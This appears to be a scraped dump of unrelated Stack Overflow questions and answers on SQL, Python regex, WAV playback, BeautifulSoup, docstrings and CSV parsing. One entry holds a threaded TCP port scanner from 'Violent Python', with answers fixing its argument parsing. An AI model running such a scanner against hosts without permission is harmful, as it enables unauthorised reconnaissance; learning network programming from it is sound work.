SELECT a.id, a.date_f, a.action FROM a WHERE a.action = 'Z'
)
SELECT a.id,
max(a.date_f) as Xdate,
temp.date_f as Zdate,
a.action
FROM a
INNER JOIN temp ON temp.id = a.id AND a.date_f < temp.date_f
WHERE a.action = 'X'
GROUP BY a.id,temp.date_f,a.action;
```
**Note**: date\_f is the field date.
**[SQL Fiddle Demo](http://sqlfiddle.com/#!4/adc50/10)**. | Nested subquery in Oracle is slow | [
"",
"sql",
"oracle",
""
] |
So I'm learning Python and hacking at the same time from "Violent Python" and I ran into a problem
Here's my code:
```
import optparse
import socket
from socket import *
from threading import *
screenLock = Semaphore(value = 1)
def connScan(tgtHost, tgtPort):
try:
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
connSkt.send('ViolentPython\r\n')
results = connSkt.recv(100)
screenLock.acquire()
print '[+]%d/tcp open' %tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-]%d/tcp closed' %tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print "[-] Cannot resolve '%s': Unknown host" %tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP)
print '\n[+] Scan Results for ' +tgtName[0]
except:
print '\n[+] Scan Results for ' +tgtIP
setdefaulttimeout(10)
for tgtPort in tgtPorts:
print 'Scanning port ' +tgtPort
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog ' +\
'-H <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', \
help='specify target port[s] seperated by a comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(', ')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
```
Running the program I get the following error message:
```
File "port_scanner.py", line 54, in <module>
main()
File "port_scanner.py", line 52, in main
portScan(tgtHost, tgtPorts)
File "port_scanner.py", line 37, in portScan
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
ValueError: invalid literal for int() with base 10: '21,'
```
Can anyone please help? I'm still new at this but my guess is Python isn't separating the different ports I'm inputting by running this command:
```
python port_scanner.py -H 74.207.244.221 -p 21, 22, 80
```
The ip I'm targeting is scanme.org and is made for scanning. Thanks! | First of all, you are misunderstanding how your command line is being parsed.
You pass in:
```
python port_scanner.py -H 74.207.244.221 -p 21, 22, 80
```
which means that Python sees:
```
['-H', '74.207.244.221', '-p', '21,', '22,', '80']
```
and the `optparse.OptionParser` thus parses *just* `'21,'` as the value for the `-p` switch. As a result, `options.tgtPort` is set to `'21,'`, and `.split(', ')` on that value results in `['21,']` because there is *no* `', '` (comma and space) in that input string.
To include spaces in an argument, use quoting on the command line:
```
python port_scanner.py -H 74.207.244.221 -p "21, 22, 80"
```
but you really want to adjust your command-line parsing to split *just* on commas and tolerate spaces instead:
```
tgtPorts = [p.strip() for p in options.tgtPort.split(',')]
```
Another thing to understand is that splitting a string using `.split()` will result in a list with *at least* one element:
```
>>> 'foo'.split(',')
['foo']
```
so your test for `tgtPorts[0] == None` will always be `False`. Note that the normal Python idiom is to use `is` for `None` instead (`tgtPorts[0] is None`) because `None` is a singleton. | You have a comma in the value of the port, so Python can't convert the string into integer smoothly. You can reproduce this exception in interpreter easily:
```
>>> int("2,")
Traceback (most recent call last):
File "<pyshell#27>", line 1, in <module>
int("2,")
ValueError: invalid literal for int() with base 10: '2,'
>>> int("2")
2
```
To remove the comma, simply don't pass it in at the command line. Or if you really have to, process the input so that it can be converted. | Violent Python: port inputs not being seperated | [
"",
"python",
""
] |
I am learning regular expressions and trying to do the following:
Below is the format of a series of alpha numeric digits. It starts with 4 digits followed by 2 spaces followed by 8 digits followed by a single space followed by 8 digits followed by a single space followed by 8 digits followed by a single space followed by 8 digits followed by a single space followed by an OR bar.
```
FFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |
```
or written more clearly:
```
FFFF[space][space]FFFFFFFF[space]FFFFFFFF[space]FFFFFFFF[space]FFFFFFFF[space]|
```
I first need to find the correct line in a file which starts with 00A3. Then I need to pull out the digit groups which I have framed with the using:
```
p = re.compile('00A3 ') # search for 00A3[space][space]
r = re.compile(???) # search for desired 8 digit groups
q = re.compile(\[SECTION2\])
dataString = inFile.next() # 00A3 388A63FF 00000DF1 52984731 FF989ACB
while not q.match(dataString) # look for [SECTION2] line in file. This means we passed where 00A3 would have been so it must not be here.
if p.match(dataString):
numbers = r.findall(dataString) # numbers = [388A63FF, 00000DF1, 52984731, FF989ACB]
break
dataString = inFile.next() # get next line to check
```
This should give me a list of the numbers for further processing. Im just not sure how to write the regex that will find only the 4 groups of 8 alpha numeric digits seperated with a space. My thought was to look for 8 alpha numeric digits together with a space in front and a space behind, but would that cause a problem and how would that look?
I looked into the look ahead and look behind options, but i get confused.
I am still very new to this, especially in Python so I am open to suggestions on better implementation.
Thanks! | You could use one regular expression for a single 8 digit group and then find all the matches in a line.
```
line = #string
regex = re.compile(r' (\w{8})')
groups = regex.findall(line) #gives a list of the matches in order of appearance
``` | You can indeed use [lookarounds](http://www.regular-expressions.info/lookaround.html):
```
(?<=\d{4}\s{2})(\d{8}\s){4}(?=[\s|])
``` | Python Regular expressions for alpha numeric digits | [
"",
"python",
"regex",
""
] |
2 I have two tables
one logs.emails:
```
EmailNum EmployeeID, Emailcontent, EmailReceivers ,is_read
1 1 , "sasa" , "sas@google.com" ,1
2 1 , "sasa" , "sas@google.com" ,0
3 2 , "sasa" , "sas@google.com" ,0
4 2 , "sasa" , "sas@google.com" ,0
5 2 , "sasa" , "sas@google.com" ,0
```
and Employees.user
```
id, FirstName, LastNAme
1 , "John" , "Brown"
2 , "Jack" , "James"
```
My desired Output:
> FirstName, LastName, NumOfUnreadEmails
> John , Brown , 1
> Jack , James ,3
My attempt(But it does not return the irst row of desired output which is "John , Brown ,1"):
```
SELECT
*, count(EmployeeID) as NumEmails
FROM
logs.emails a
inner join
Employees.user b on a.EmployeeID=b.id
group by
EmployeeID
having
a.is_read='0'
```
Your help is appreciated | You should specify a `WHERE` clause here instead of using `HAVING`, as you are trying to filter out the records that have `is_read=0` prior to doing any aggregation.
Also, in order to get only the fields desired, don't use `*` . Simply specify the fields you want.
```
SELECT
b.FirstName, b.LastName, COUNT(a.EmailNum)
FROM
logs.emails a
inner join
Employees.user b on a.EmployeeID=b.id
where
a.is_read='0'
group by
b.id
``` | Try this way:
```
SELECT b.FirstName, b.LastName,
sum( case
when a.is_read=0 than 1
else 0
end ) as NumOfUnreadEmails
FROM logs.emails a
inner join Employees.user b on a.EmployeeID=b.id
group by b.FirstName, b.LastName
``` | MySQL Query (Group by) | [
"",
"mysql",
"sql",
""
] |
I want to write a loopless program (probably using comprehension) to remove duplicate elements in a sorted array in Python (and most efficiently too). | Since the list is sorted - meaning all the duplicates are already grouped, you can use `itertools.groupby`
```
>>> testList = [1, 1, 1, 2, 3, 3, 4, 4, 5, 6, 7, 8, 8, 9]
>>> from itertools import groupby
>>> [k for k, g in groupby(testList)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
```
This is more efficient (in memory and time) that converting to a set and sorting. It also has the advantage of only needing to compare for equality, so works ok for unhashable items too. | I would personally just use this.
```
>>> testList = [1, 1, 1, 2, 3, 3, 4, 4, 5, 6, 7, 8, 8, 9]
>>> sorted(set(testList))
[1, 2, 3, 4, 5, 6, 7, 8, 9]
```
You can even sort a list from the beginning.
```
>>> from random import shuffle
>>> shuffle(testList)
>>> testList
[1, 4, 5, 6, 2, 1, 3, 3, 4, 9, 8, 1, 7, 8]
>>> sorted(set(testList))
[1, 2, 3, 4, 5, 6, 7, 8, 9]
``` | Loopless program to remove duplicate elements in a sorted array | [
"",
"python",
""
] |
I tried PyGame for playing a WAV file like this:
```
import pygame
pygame.init()
pygame.mixer.music.load("mysound.wav")
pygame.mixer.music.play()
pygame.event.wait()
```
but It change the voice and I don't know why!
I read [this link](https://stackoverflow.com/questions/307305/play-a-sound-with-python) solutions and can't solve my problem with playing wave file!
for this solution I dont know what should I import?
```
s = Sound()
s.read('sound.wav')
s.play()
```
and for this solution /dev/dsp dosen't exist in new version of linux :
```
from wave import open as waveOpen
from ossaudiodev import open as ossOpen
s = waveOpen('tada.wav','rb')
(nc,sw,fr,nf,comptype, compname) = s.getparams( )
dsp = ossOpen('/dev/dsp','w')
try:
from ossaudiodev import AFMT_S16_NE
except ImportError:
if byteorder == "little":
AFMT_S16_NE = ossaudiodev.AFMT_S16_LE
else:
AFMT_S16_NE = ossaudiodev.AFMT_S16_BE
dsp.setparameters(AFMT_S16_NE, nc, fr)
data = s.readframes(nf)
s.close()
dsp.write(data)
dsp.close()
```
and when I tried pyglet It give me this error:
```
import pyglet
music = pyglet.resource.media('mysound.wav')
music.play()
pyglet.app.run()
--------------------------
nima@ca005 Desktop]$ python play.py
Traceback (most recent call last):
File "play.py", line 4, in <module>
music = pyglet.resource.media('mysound.wav')
File "/usr/lib/python2.7/site-packages/pyglet/resource.py", line 587, in media
return media.load(path, streaming=streaming)
File "/usr/lib/python2.7/site-packages/pyglet/media/__init__.py", line 1386, in load
source = _source_class(filename, file)
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 194, in __init__
format = wave_form.get_format_chunk()
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 174, in get_format_chunk
for chunk in self.get_chunks():
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 110, in get_chunks
chunk = cls(self.file, name, length, offset)
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 155, in __init__
raise RIFFFormatException('Size of format chunk is incorrect.')
pyglet.media.riff.RIFFFormatException: Size of format chunk is incorrect.
AL lib: ReleaseALC: 1 device not closed
``` | You can use [PyAudio](https://people.csail.mit.edu/hubert/pyaudio/docs/#class-pyaudio). An example here on my Linux it works:
```
#!usr/bin/env python
#coding=utf-8
import pyaudio
import wave
#define stream chunk
chunk = 1024
#open a wav format music
f = wave.open(r"/usr/share/sounds/alsa/Rear_Center.wav","rb")
#instantiate PyAudio
p = pyaudio.PyAudio()
#open stream
stream = p.open(format = p.get_format_from_width(f.getsampwidth()),
channels = f.getnchannels(),
rate = f.getframerate(),
output = True)
#read data
data = f.readframes(chunk)
#play stream
while data:
stream.write(data)
data = f.readframes(chunk)
#stop stream
stream.stop_stream()
stream.close()
#close PyAudio
p.terminate()
``` | Works for me on Windows:
<https://pypi.org/project/playsound/>
```
>>> from playsound import playsound
>>> playsound('/path/to/a/sound/file/you/want/to/play.wav')
```
NOTE: This has a bug in Windows where it doesn't close the stream.
I've added a PR for a fix here:
<https://github.com/TaylorSMarks/playsound/pull/53/commits/53240d970aef483b38fc6d364a0ae0ad6f8bf9a0> | Play WAV file in Python | [
"",
"python",
"audio",
"pygame",
"pyglet",
""
] |
Python 3.2
```
t = (1, 2, 3)
t2 = (5, 6, 7)
z = zip(t, t2)
for x in z:
print(x)
```
Result:
```
(1, 5)
(2, 6)
(3, 7)
```
Putting in EXACTLY the same loop immediately after, nothing is printed:
```
for x in z:
print(x)
```
`z` still exists as `<zip object at 0xa8d48ec>`. I can even reassign the `t`, `t2` to be zipped again, but then it only works once and only once, again.
Is this how its supposed to work? There's no mention in [the docs](https://docs.python.org/3.2/library/functions.html#zip) about this. | That's how it works in python 3.x. In python2.x, `zip` returned a list of tuples, but for python3.x, `zip` behaves like `itertools.izip` behaved in python2.x. To regain the python2.x behavior, just construct a list from `zip`'s output:
```
z = list(zip(t,t2))
```
Note that in python3.x, a lot of the builtin functions now return iterators rather than lists (`map`, `zip`, `filter`) | Because `zip` returns an iterator in Python 3.x. If you want to re-use it, then make it a `list` first:
```
z = list(zip(t, t2))
``` | zip variable empty after first use | [
"",
"python",
"python-3.x",
"iterator",
""
] |
I am new to SQL development. So I would like to get some help from SO.
I have three tables : **student**, **student\_addresses**, **student\_phones**.
Their schema is roughly as follows :
```
student
-------
student_id (Primary Key)
student_name
father_name
mother_name
student_addresses
-----------------
student_address_id (Primary Key)
student_id (Foreign Key)
address
zip_code
student_phones
--------------
student_phone_id (Primary Key)
student_id (Foreign Key)
phone_type
phone_number
```
Both **student\_addresses** and **student\_phones** are a has\_many relation. So I would like to SELECT all the fields from **student** for a particular **student\_id** but only the matching counts(total) from student\_addresses and **student\_phones** for that **student\_id**. How do I get that ?
I have tried this query, but it returns an error :
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students,student_phones,student_addresses
WHERE students.student_id = student_phones.student_id AND
students.student_id = student_addresses.student_id AND
students.student_id = 7;
```
PS : Currently I am using this on PostgreSQL. However, I would like to work it on MySQL also. So does that mean I need to have two different queries ? AFAIK, for this purpose, just a single query will work on both (since both MySQL and PostgreSQL follow the same SQL implementation, as far as this query requirement is concerned).
I am wondering, if I can do it without using GROUP BY. Because, suppose the student table has more fields, say 12, then I will have to put all of the field names both to SELECT as well as to GROUP BY(AFAIK), which seems a bit inelegant. | This should work on MySQL and PostgreSQL:
```
SELECT s.student_id,
max(s.student_name) student_name,
max(s.father_name) father_name,
max(s.mother_name) mother_name,
COUNT(distinct a.student_address_id) total_addresses,
COUNT(distinct p.student_phone_id) total_phones
FROM students s
LEFT JOIN student_phones p ON s.student_id = p.student_id
LEFT JOIN student_addresses a ON s.student_id = a.student_id
WHERE s.student_id = 7
GROUP BY s.student_id
``` | Just add `GROUP BY`:
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students,student_phones,student_addresses
WHERE students.student_id = student_phones.student_id AND
students.student_id = student_addresses.student_id AND
students.student_id = 7
GROUP BY students.student_id,student_name,father_name,mother_name;
```
But if it happens that student with id 7 has no address or no phone number, it will return no result. To return something even in this case, try using `LEFT JOIN`s:
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students
LEFT JOIN student_phones ON students.student_id = student_phones.student_id
LEFT JOIN student_addresses ON students.student_id = student_addresses.student_id
WHERE students.student_id = 7
GROUP BY students.student_id,student_name,father_name,mother_name;
``` | SQL Query to get the data | [
"",
"mysql",
"sql",
"database",
"postgresql",
""
] |
Here is the information in the file:
```
"Part no.","Description","Price"
"453","Sperving_Bearing","9900"
"1342","Panametric_Fan","23400"
"9480","Converter_Exchange","93859"
```
I'm trying to figure out how to open up a file and then store it's contents into a dictionary using the Part no. as the key and the other information as the value. So I want it to look something like this:
```
{Part no.: "Description,Price", 453: "Sperving_Bearing,9900", 1342: "Panametric_Fan,23400",9480: "Converter_Exchange,93859"}
```
I was able to store the text from the file into a list, but I'm not sure how to assign more than one value to a key. I'm trying to do this without importing any modules. I've been using the basic str methods, list methods and dict methods.
Here is my code so far: ( I'm assuming the filename will correctly be entered)
```
textname = input("ENter a file")
thetextfile = open(textname,'r')
print("The file has been successfully opened!")
thetextfile = thetextfile.read()
file_s = thetextfile.split()
holder = []
ck = 0
for c in range(len(file_s)):
holder.append(file_s[c])
ck = ck+1
if(ck == 3):
holder.insert(c,'\n')
count = 0
holder_string = "".join(holder)
holder = holder_string.split("\n")
wordlist = {}
#kind of stuck here.
``` | A SCV is a comma separated variable file so I'm going to assume that each variable is indeed separated by commas:
```
f = open("myfile.csv", 'r')
data = f.read().split('\n') #separates the contents into lines with while leaving out the newline characters
myDict = {}
for x in range(len(data)):
data[x] = data[x].split(',') #makes each line a list of variables. If the data is contain extra white spaces use the strip() method
myDict[data[x][0]] = (data[x][1], data[x][2]) #this will make the dictionary like you described in the question
```
don't forget to lose your files (unless you're using the `with` statement). | Perhaps like this:
```
wordlist = {}
with open(textname, 'r') as thetextfile:
for line in thetextfile:
line = line.split()
wordlist[line[0]] = line[1:]
```
That makes the dict values the (more convenient) list of remaining items. But, if you really wanted the "," string syntax that you have above, maybe:
```
wordlist = {}
with open(textname, 'r') as thetextfile:
for line in thetextfile:
line = line.split()
wordlist[line[0]] = ",".join(line[1:])
``` | How to extract contents of a csv file and place them in a dict file type without using csv module. [python] | [
"",
"python",
"string",
"list",
"dictionary",
"io",
""
] |
I really like using docstrings in Python to specify type parameters when projects get beyond a certain size.
I'm having trouble finding a standard to use to specify that a parameter is a list of specific objects, e.g. in Haskell types I'd use [String] or [A].
Current standard (recognisable by PyCharm editor):
```
def stringify(listOfObjects):
"""
:type listOfObjects: list
"""
return ", ".join(map(str, listOfObjects))
```
What I'd prefer:
**OPTION 1**
```
def stringify(listOfObjects):
"""
:type listOfObjects: list<Object>
"""
return ", ".join(map(str, listOfObjects))
```
**OPTION 2**
```
def stringify(listOfObjects):
"""
:type listOfObjects: [Object]
"""
return ", ".join(map(str, listOfObjects))
```
I suppose that wasn't a great example - the more relevant use case would be one where the objects in the list must be of a specific type.
**BETTER EXAMPLE**
```
class Food(Object):
def __init__(self, calories):
self.calories = calories
class Apple(Food):
def __init__(self):
super(self, 200)
class Person(Object):
energy = 0
def eat(foods):
"""
:type foods: [Food] # is NOT recognised by editor
"""
for food in foods:
energy += food.calories
```
So, other than the fact that I'm getting hungry, this example illustrates that if called with a list of the wrong kind of object, the code would break. Hence the importance of documenting not only that it needs a list, but that it needs a list of Food.
**RELATED QUESTION**
[How can I tell PyCharm what type a parameter is expected to be?](https://stackoverflow.com/questions/6318814/how-can-i-tell-pycharm-what-type-a-parameter-is-expected-to-be)
Please note that I'm looking for a more specific answer than the one above. | In comments section of [PyCharm's manual](http://www.jetbrains.com/pycharm/webhelp/type-hinting-in-pycharm.html) there's a nice hint from developer:
```
#: :type: dict of (str, C)
#: :type: list of str
```
It works for me pretty well. Now it makes me wonder what's the best way to document parametrized classes in Python :). | As pointed out in the [PyCharm docs](https://www.jetbrains.com/help/pycharm/type-syntax-for-docstrings.html), *a* (legacy, pre-[PEP-484](https://www.python.org/dev/peps/pep-0484/)) way of doing this is using square brackets:
> list[Foo]: List of Foo elements
>
> dict[Foo, Bar]: Dict from Foo to Bar
`list of str`, as suggested in [the accepted answer](https://stackoverflow.com/a/19524180/942774), *does not work* as expected in PyCharm.
Starting with Python 3.5 and the implementation of [PEP-484](https://www.python.org/dev/peps/pep-0484/), you can also use type hints, which may be nicely supported by your IDE/editor. How this is easily done in PyCharm is explained [here](https://www.jetbrains.com/help/pycharm/type-hinting-in-product.html).
In essence, to declare a list return type using type-hinting (Python >=3.5), you may do something like this:
```
from typing import List
"""
Great foo function.
:rtype: list[str]
"""
def foo() -> List[str]:
return ['some string', 'some other string']
```
Here we declare (somewhat redundantly) that the function `foo` returns a list of strings, both in the type hint `-> List[str]` and in the docstring `:rtype: list[str]`.
Other pre-declared types and more info can be found in the Python docs for [typing](https://docs.python.org/3/library/typing.html). | How to specify that a parameter is a list of specific objects in Python docstrings | [
"",
"python",
"pycharm",
"docstring",
""
] |
Does the BeautifulSoup library for Python have any function that can take a list of nodes and return the lowest common ancestor?
If not, has any of you ever implemented such a function and care to share it? | I think this is what you want, with link1 being one element and link2 being another;
```
link_1_parents = list(link1.parents)[::-1]
link_2_parents = list(link2.parents)[::-1]
common_parent = [x for x,y in zip(link_1_parents, link_2_parents) if x is y][-1]
print common_parent
print common_parent.name
```
It'll basically walk both elements' parents from root down, and return the last common one. | The accepted answer does not work if the distance from a tag in the input list to the lowest common ancestor is not the exact same for every nodes in the input.
It also uses every ancestors of each node, which is unnecessary and could be very expensive in some cases.
```
import collections
def lowest_common_ancestor(parents=None, *args):
if parents is None:
parents = collections.defaultdict(int)
for tag in args:
if not tag:
continue
parents[tag] += 1
if parents[tag] == len(args):
return tag
return lowest_common_ancestor(parents, *[tag.parent if tag else None for tag in args])
``` | BeautifulSoup lowest common ancestor | [
"",
"python",
"algorithm",
"graph",
"beautifulsoup",
""
] |
I've been trying to generate a working regex that finds attributes of html tags for
a while now but they all seem to fail one way or another.
Using regex because loading beautifulsoup takes too long for just checking one html tag.
Here is an example of the tag/property which needs to be checked:
```
<meta content="http://domain.com/path/path/file.jpg" rnd_attr="blah blah"
property="og:image"/>
```
How could a regex retrieve the content of this tag while making sure that the tag is of "og:image".
Sorry if this question is a bit naive or if its totally unfeasibly hard to generate the regex.
BONUS: Aside from BeautifulSoup, what other fast / working alternatives for DOM parserish things are there in python?
Thanks. | # Description
This expression will
* find the meta tag which has an attribute `property="og:image"`
* avoid some really difficult edge cases
* capture the value of the content attribute
* allow the attributes to appear in any order
`<meta(?=\s|>)(?=(?:[^>=]|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*?\sproperty=(?:'og:image|"og:image"|og:image))(?=(?:[^>=]|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*?\scontent=('[^']*'|"[^"]*"|[^'"][^\s>]*))(?:[^'">=]*|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*>`

# Example
In this live example, note the difficult edge case in the first two meta tag sample text: <http://www.rubular.com/r/YY70uaGPLE>
**Sample Text**
```
<meta info=' content="DontFindMe" ' content="http://domain.com/path/path/file1.jpg" random_attr="blah blah"
property="og:image"/>
<meta content="http://domain.com/path/path/file2.jpg" random_attr="blah blah"
property="og:image"/>
<meta random_attr="blah blah" property='og:image' content="foo'" />
```
**Matches**
```
[0][0] = <meta info=' content="DontFindMe" ' content="http://domain.com/path/path/file1.jpg" random_attr="blah blah"
property="og:image"/>
[0][1] = "http://domain.com/path/path/file1.jpg"
[1][0] = <meta content="http://domain.com/path/path/file2.jpg" random_attr="blah blah"
property="og:image"/>
[1][1] = "http://domain.com/path/path/file2.jpg"
[2][0] = <meta random_attr="blah blah" property='og:image' content="foo'" />
[2][1] = "foo'"
``` | Have you actually benchmarked it and found that BeautifulSoup was the bottleneck?
```
content = soup.find('meta', property='og:image').get('content')
```
You could also use [lxml](http://lxml.de/), which is much faster:
```
import lxml.html
root = lxml.html.fromstring(html) # Use .parse() on a file-like object instead
content = root.xpath('/html/head/meta[@property="og:image"][1]/@content')
``` | Regex in python that finds the attribute of some HTML tag? | [
"",
"python",
"regex",
"beautifulsoup",
""
] |
Today I have encountered an odd issue with ISNULL function in SQL
I have table contains the customer information I have to display a full name concatenating First, Middle Initial and Last Name, In the table I know Middle Initial is a nullable column.
So I used ISNULL function in SQL to return the Middle Initial if it is not null, which works fine but I used the ISNULL function with a expression as below which I ideally should not work in case if the MI is null, but interestingly it worked.
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI + '.', '') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
Above SOL Query should return me MiddleInitial as "." when MiddleInitial is null, but it did return as empty string.
So I wrote another query as below.
```
SELECT (MI + '.') AS MiddleInitial FROM CS_tblMaster WHERE CustomerNo = 2627240
```
which again given as NULL
Somehow when you concatenate a string with NULL value it returns null. I would like to understand of this implementation.
Can someone help | – Original statement
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI + '.', '') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
– My original answer (edited)
```
SELECT FirstName + ' ' + LastName + ' '+ (ISNULL(MI, '') + '.') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
In this case, SQL would first check to see if MI is Null and uses MI if Not Null or uses an empty string if it is. *Then* it concatenates that result, which is now never Null, with the period.
– Final answer
```
SELECT
FirstName + ' ' + LastName + ' '
+ CASE WHEN MI IS NULL THEN '' ELSE MI + '.' END As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
@Satish, not sure if you feel you have answer yet since you haven't selected one, and I apologize if my answer was short and fast. Seeing all the responses made me realize I hadn't thought much about your question when I first saw it.
To answer “I would like to understand of this implementation”, Nulls are a completely special value in SQL. Not an empty string, not spaces, not zeros. They mean in a more literal sense “nothing”. You can check for them, can see if something *is* null. But you can't “do” things with Nulls. So 57 + Null = Null. 'Mary' + Null = Null. ((12 \*37) +568) / Null = Null. The Max() of 'Albert', 'Mary', Null, and 'Zeke' is Null. This article <http://en.wikipedia.org/wiki/Null_(SQL)> may help, with a decent description in the section on Null Propagation.
The Isnull function is not so much a test for Null, but a way to handle it. So to *test* if something is Null you would use ColumnName Is Null or ColumnName Is Not Null in your Select. What Isnull(MI,'') says is: I want a value, if the value of MI it not null, then I want MI, otherwise I want an empty string.
Going on, I'm not sure I initially understood what you were actually trying to do. If you were trying to get a period when the middle initial was null, then my original answer and most of the others would work for you. But I think you may be trying to say: If I have a middle initial, then I want the middle initial followed by a period. If I don't have middle initial then I want nothing: 'Alberto C. Santaballa' or 'Alberto Santaballa', never 'Alberto . Santaballa”. If that is the case then use the final statement in the edited answer.
@Zec, thanks for the edit. The typo was another product of too-fast typing! :-/ | If you want to put a period if the MI is null use this: (You just have your `'.'` in the wrong spot)
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI, '.') As MiddleInitial FROM CS_tblMaster WHERE CustomerNo = 2627240
``` | ISNULL in SQL Server 2008 | [
"",
"sql",
"sql-server-2008",
""
] |
persons.CSV file looks like:
```
Firstname,Surname,Birth Year,Hobby
John,Smith,1990,"tenis,piano"
Andrew,Josh,1988,"surfing,art"
```
I would like that in program hobby will be represented as list not as string. How can I force to that DictReader?
The python code I use look as follows:
```
import csv
class Person(object):
extPerson = []
counter = 0
def __init__(self, **args):
for k, v in args.items():
setattr(self, k, v)
Person.counter += 1
Person.extPerson.append(self)
def __str__(self):
s=""
for k,v in self.__dict__.items():
s+=k+": "+v+", "
return s
csvdr = csv.DictReader(open('persons.csv'))
for p in csvdr:
print p
Person(**p)
for p in Person.extPerson:
print p
print p.Hobby
```
The output looks as follows:
```
{'Birth Year': '1990', 'Hobby': 'tenis,piano', 'Surname': 'Smith', 'Firstname': 'John'}
{'Birth Year': '1988', 'Hobby': 'surfing,art', 'Surname': 'Josh', 'Firstname': 'Andrew'}
Birth Year: 1990, Hobby: tenis,piano, Surname: Smith, Firstname: John,
tenis,piano
Birth Year: 1988, Hobby: surfing,art, Surname: Josh, Firstname: Andrew,
surfing,art
```
I would like hobbys being packed in constructor into list:
```
(...)
Birth Year: 1990, Hobby: ['tenis','piano'], Surname: Smith, Firstname: John,
['tenis', 'piano']
Birth Year: 1988, Hobby: ['surfing','art'], Surname: Josh, Firstname: Andrew,
['surfing', 'art']
``` | As you're reading the rows in, you need to `split()` the hobby field:
```
one_row = {'Birth Year': '1990', 'Hobby': 'tenis,piano', 'Surname': 'Smith', 'Firstname': 'John'}
one_row['Hobby'] = one_row['Hobby'].split(',')
one_row
Out[7]:
{'Birth Year': '1990',
'Firstname': 'John',
'Hobby': ['tenis', 'piano'],
'Surname': 'Smith'}
```
In your current code, this would go here:
```
for p in csvdr:
p['Hobby'] = p['Hobby'].split(',')
print p
Person(**p)
```
Your current `__str__` method won't work with the lists, but you only need a small change to fix that- you convert the list values to strings using `str`, and the string values are unaffected:
```
def __str__(self):
s=""
for k,v in self.__dict__.items():
s += k + ": " + str(v) + ", "
return s
``` | ```
class MyDictReader(csv.DictReader):
def next(self):
if self.line_num == 0:
# Used only for its side effect.
self.fieldnames
row = self.reader.next()
self.line_num = self.reader.line_num
# unlike the basic reader, we prefer not to return blanks,
# because we will typically wind up with a dict full of None
# values
while row == []:
row = self.reader.next()
row = map(lambda x:x.split(",") if "," in x else x,row)
d = dict(zip(self.fieldnames, row))
lf = len(self.fieldnames)
lr = len(row)
if lf < lr:
d[self.restkey] = row[lf:]
elif lf > lr:
for key in self.fieldnames[lr:]:
d[key] = self.restval
return d
``` | CSV DictReader, how to force a part in "" to be read as list not as string | [
"",
"python",
"oop",
"csv",
""
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.